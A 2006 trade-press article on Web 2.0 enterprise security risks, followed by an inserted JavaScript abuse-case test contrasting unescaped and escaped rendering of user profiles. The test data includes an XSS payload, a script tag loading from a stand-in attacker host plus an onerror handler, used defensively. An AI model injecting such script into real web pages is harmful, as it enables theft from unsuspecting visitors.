Making Web 2.0 Secure

By CIOinsight  |  Posted 09-15-2006

Field Report: Security in the World of Web 2.0

If you haven't heard the hype around Web 2.0, you've been living under a rock. Wikipedia is one of the most popular sites on the Web. There are more than 52 million blogs. And the research firm Gartner Inc. recently added Web 2.0 to its ubiquitous emerging technologies hype cycle, predicting widespread adoption within two years. In light of the success of startups like MySpace, YouTube and Digg, Dan Gillmor, director of the Center for Citizen Media, CIO Insight columnist and author of We the Media: Grassroots Journalism by the People, for the People (O'Reilly Media, 2004), says, "If I were a shareholder of a company that's not wondering about how it can use Web 2.0 more effectively, I would sell my stock."

In its most basic sense, Web 2.0 refers to any tool or application that's delivered over the Internet and allows people to interact—by contributing, editing and sharing content. Instead of merely putting static content on a Web site (Web 1.0), the Internet is now delivering applications and tools that allow users to participate (Web 2.0). But Web 2.0 goes beyond even that. Does your company use any type of software as a service? That's Web 2.0. And if you're designing a service-oriented architecture, that's Web 2.0, too. "Companies are looking at Web 2.0 as a new medium," says Amrit Williams, an analyst at Gartner. "It's an opportunity to innovate and create new revenue."

That may be true, but Web 2.0 is also an opportunity for hackers and others who seek to harm the enterprise. "Any time there is a new advancement in technology, there is a new set of security problems," says Williams. And those problems differ from the ones that have traditionally plagued the enterprise. Here's why: Web 2.0 applications are often complex JavaScript programs that run inside the browser and keep data on the end user's computer. Because code and data aren't fetched from a central server on every interaction, the applications feel much more responsive. The downside? That locally cached data sits outside the server-side controls the enterprise relies on. What's more, in the rush to put these new tools in place, security is often an afterthought, leaving the applications themselves open to attack.

"Imagine I have a Web 2.0 app that's an e-mail client, downloaded in Java onto my system," says Tom Longstaff, deputy director of technology at Carnegie Mellon University's CERT Coordination Center, which studies Internet security vulnerabilities. "The messages are cached locally. And because that client is not on my company's server, it's not as well protected. So along comes another application that attacks the e-mail client and gains access to my cached messages—and my system." Another scenario: A banking employee uses a Web service for complex calculations of sensitive data. "If you are interacting with other Web pages you have visited, an advanced phishing attack could be launched that captures that data without the user even knowing it," Longstaff says.

And because most companies don't have visibility down to each individual desktop computer, monitoring vulnerabilities is practically impossible. "When you are running programs on a server and have control over the environment, you can monitor network activity," Longstaff says. But with Web 2.0, the attacks are against individual computers. "What's really going on," says Gartner's Williams, "is that firms are now creating services outside their corporate perimeters that allow interaction from stakeholders on the Internet. As a result, they are losing visibility over their security."

Already, malicious code has hit Web 2.0 services: a self-propagating cross-site scripting worm spread through MySpace in October 2005, and the site was taken down for two full days. The threat to the enterprise has remained small—so far. "But hackers are still learning," says Longstaff. And with the growing ease of creating new Web sites, "the ability for people to post malicious tools is also easier," Williams says.

Ironically, most companies that have spent the past decade hardening their perimeter security are now finding they need to punch holes in their firewall to allow for Web 2.0 applications. And in this new reality, they're not just worrying about bad guys getting in. At Wilson & Company Inc., an Albuquerque, N.M.-based engineering firm, Director of IT Ray Benegas says the bigger issue is keeping sensitive data from leaking out. "As a company, we have to acknowledge the existence of these new technologies," he says. "Internally, these tools are necessary for collaboration, and we try to control them without hampering creativity. But we need to control and secure the environment." As a result, Benegas' firm recently revamped its policies around exactly what information can be shared. "We have specific internal policies that explain acceptable use, and how we expect our staff to behave." So far, he says, the policies have been effective.

Making Web 2.0 Secure

A thoroughly crafted set of policies is absolutely essential, says Gillmor of the Center for Citizen Media. "If companies have a clear policy on what bloggers are not supposed to do, they can avoid a lot of the problems to start with," he says. But enforcement is important, too, says Josh Kessler, an analyst at Boston-based research firm TowerGroup Inc. "Your employees are an incredible threat to security because they have access to your data," he says. "Without appropriate efforts to control that, a policy means nothing. You really need some kind of enforcement." Vendors such as Covelight Systems Inc., Vontu Inc., SmartLine Inc. and others sell software that lets companies tag sensitive data and monitor its movement, so that it can be stopped before it leaves the corporate network.

That's all fine and good. But when it comes to making Web 2.0 truly secure, experts agree the most important measure is to bake security into the applications themselves. "The first thing a CIO must do is make security a priority of the application development team," says Gartner's Williams. "There must be a stage in the development cycle where they validate the security of an application before they expose it." That means adding a security review stage to the development cycle, and building auditing and tracking capabilities into the software so suspicious behavior can be detected once it is live.

If a third-party vendor hosts your software, make sure its security practices are transparent. Consider requesting SAS 70 audits, which were developed by the American Institute of Certified Public Accountants to give vendors a way to document their control processes for compliance with regulations such as Sarbanes-Oxley. Though helpful, these audits only confirm that the controls a vendor describes are in place; they don't look for actual weaknesses. Companies will want to take it a step further, performing penetration tests and other security assessments of their own.

At Motorola Inc., based in Schaumburg, Ill., Chief Information Security Officer Bill Boni says Web 2.0 application developers go through a training program to ensure they understand their security responsibilities. "In the urge to produce quickly, there is an all-too-natural tendency to just get it done, to prove the application does what it's supposed to do," Boni says. "Developers look at the use cases, but not the abuse cases." Boni's security team provides testing and verification of all Motorola's Web 2.0 applications. "You need to have trustworthy advisors, either inside or outside the organization, so you can have reasonable assurances that the platform not only performs, but also does not contain easily exploitable vulnerabilities," he says.
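What an "abuse case" looks like for the kind of application this article describes, as an added example that is not code from the article, from Motorola or from any vendor named here: a hypothetical Web 2.0 profile page that renders user-contributed text. The use case is "show the member's bio"; the abuse case is a member who puts script in the bio so that it runs in every visitor's browser, which is the mechanism behind the MySpace worm mentioned earlier. The naive renderer, the escaped renderer, the profile fields and the sample inputs are all constructed for this illustration.

```javascript
// Added example, not from the CIO Insight article: a use-case vs. abuse-case
// check for a hypothetical Web 2.0 feature that renders user-contributed content.

// Naive renderer: drops the contributor's text straight into the markup.
// This is the "use case works, ship it" version.
function renderProfileUnsafe(profile) {
  return `<div class="profile"><h1>${profile.name}</h1><p>${profile.about}</p></div>`;
}

// Escape the five characters that let text break out of an HTML text node
// or a double/single-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: same use case, but every user-controlled field is
// escaped before it is placed in the page.
function renderProfileSafe(profile) {
  return `<div class="profile"><h1>${escapeHtml(profile.name)}</h1>` +
         `<p>${escapeHtml(profile.about)}</p></div>`;
}

// Abuse-case probe: does a raw <script> tag or an inline on* event handler
// survive in the rendered output? Deliberately crude; a real test suite
// would drive an HTML parser or a browser rather than a regex.
function containsActiveContent(html) {
  return /<script[\s>]|<[^>]+\son\w+\s*=/i.test(html);
}

// Constructed sample input: an ordinary member (use case) and a member who
// tries to smuggle script into every visitor's browser (abuse case).
const normalUser = { name: 'Alice', about: 'I like rock climbing & coffee.' };
const maliciousUser = {
  name: 'Mallory',
  about: '<script src="http://evil.example/w.js"></script><img src=x onerror="steal()">',
};

// Run both renderers against both inputs and report what survived.
function runAbuseCases() {
  return {
    unsafeNormal: containsActiveContent(renderProfileUnsafe(normalUser)),       // false
    unsafeMalicious: containsActiveContent(renderProfileUnsafe(maliciousUser)), // true: abuse case succeeds
    safeMalicious: containsActiveContent(renderProfileSafe(maliciousUser)),     // false: escaped
    // The fix must not break the use case: the bio text is still there, with '&' escaped.
    safeNormalKeepsText: renderProfileSafe(normalUser).includes('rock climbing &amp; coffee'),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runAbuseCases());
}
```

The point of the second and third checks together is the one Boni makes: a test that only exercises the use case passes against both renderers, while the abuse case distinguishes them. Checks like these belong in the validation stage Williams describes, before the application is exposed.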

And it's important to get a handle on the security of these new Web 2.0 tools now, because the growing proliferation of wireless networks will only make things more complex. "Mobility increases the attack surface area of a company, and I think the combination of that and these new tools will require a lot of attention in the near term," says Boni.

However Web 2.0 develops, the need to consider security is more essential than ever before. "These new applications will help companies differentiate," says Williams. "But we don't want security to become something that inhibits innovation; we want security to be the reason why we can innovate."
